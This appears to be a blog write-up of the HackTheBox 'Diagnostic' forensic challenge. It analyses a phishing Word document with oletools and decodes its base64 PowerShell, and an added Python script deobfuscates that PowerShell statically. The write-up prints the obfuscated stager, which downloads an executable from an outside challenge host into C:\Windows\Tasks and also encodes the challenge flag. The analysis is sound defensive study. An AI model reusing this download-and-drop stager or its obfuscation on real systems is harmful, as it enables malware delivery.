We covered analyzing a sample Microsoft Office Word document using oletools to extract the relevant macros and links. The sample document contained a link referencing a webpage that hosts JavaScript code. The JS code contained a base64-encoded PowerShell command that calls out to an external domain to retrieve an executable file. This was part of the HackTheBox Diagnostic forensic challenge.

CHALLENGE DESCRIPTION

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Take a look and figure out what’s going on.

Docker Setup and VM Deployment

We spin up a Docker instance that mimics the malicious hosting server. Emphasis is placed on using a malware analysis-specific virtual machine (like REMnux) to handle potentially harmful files. We attempt to resolve the document’s domain, which has become unreachable but is emulated within Docker.

Downloading and Identifying the Malicious File

A file named “layoffs.doc” is fetched either via a shortcut or by editing the hosts file. The document is identified as an OLE (Object Linking and Embedding) file, a common format for embedding scripts in Word documents.

File Analysis Using Oletools

With oleid, the document is inspected for signs of malicious activity. Although no VBScript or macro content is present, a red flag is raised by an external relationship hinting at hidden network interaction. This is further examined using oleobj, which extracts this relationship.

  • We used oleid and oleobj to analyze the Word document named layoffs.doc
  • The document contained an external link which references a webpage that contained JavaScript
  • We used the ASCII table to convert char[58] and char[34] into their corresponding ASCII characters
  • We then used CyberChef to decode the base64, which produced the following:

${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r…s','3Ms_b4D','l3','toC','HT','0l_h4nD')

&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"

  • We used PowerShell to decode the above into the challenge flag

The flag can be constructed manually by analyzing the PowerShell script and mapping each index in the format string to the corresponding array element. However, this method is inefficient; instead, run the code within PowerShell inside the REMnux VM.
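As an added example that is not part of the write-up, the following Python script resolves the -f format-operator strings and the backtick-escaped variable name statically, so the file name and the download URL are recovered without executing any of the PowerShell. The sample text is a constructed copy of the two lines above with the blog's curly quotes normalised, and the -EncodedCommand round trip shows the UTF-16LE base64 convention such commands use.

```python
import base64
import re

# Constructed copy of the two PowerShell lines from the write-up, curly quotes
# normalised to straight quotes; the '…' in the fourth argument is as printed there.
SAMPLE = r'''${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r…s','3Ms_b4D','l3','toC','HT','0l_h4nD')
&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"'''

# ("{n}{m}..." -f 'a','b',...): the PowerShell format operator with single-quoted arguments.
FORMAT_EXPR = re.compile(r'\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:\'[^\']*\'\s*,?\s*)+)\)')


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form: base64 over UTF-16LE, the encoding PowerShell expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand payload; decoding it as UTF-8 instead yields NUL-riddled text."""
    raw = base64.b64decode(b64)
    # ASCII text in UTF-16LE carries a NUL in every odd byte; plain UTF-8 text does not.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def resolve_format(fmt: str, args_src: str) -> str:
    """Apply the -f operator: replace each {i} in fmt with the i-th quoted argument."""
    args = re.findall(r"'([^']*)'", args_src)
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


def recovered_strings(script: str) -> list:
    """Every string a format expression in the script evaluates to, in order of appearance."""
    return [resolve_format(f, a) for f, a in FORMAT_EXPR.findall(script)]


def deobfuscate(script: str) -> str:
    """Rewrite the script with format expressions and backtick-escaped names collapsed."""
    # ("{1}{0}" -f 'b','a') -> "ab", kept quoted so the line stays valid PowerShell
    script = FORMAT_EXPR.sub(lambda m: '"' + resolve_format(m.group(1), m.group(2)) + '"', script)
    # ${f`ile} -> $file : a backtick inside ${...} escapes the next character, changing nothing here
    script = re.sub(r"\$\{([^}]*)\}", lambda m: "$" + m.group(1).replace("`", ""), script)
    return script


if __name__ == "__main__":
    # Round-trip through the -EncodedCommand form, as such commands are delivered.
    print(deobfuscate(decode_encoded_command(encode_command(SAMPLE))))
```

Running it prints the two lines with the file name and the Invoke-WebRequest target in the clear, which is all the analyst needs from this script; nothing is downloaded.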

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.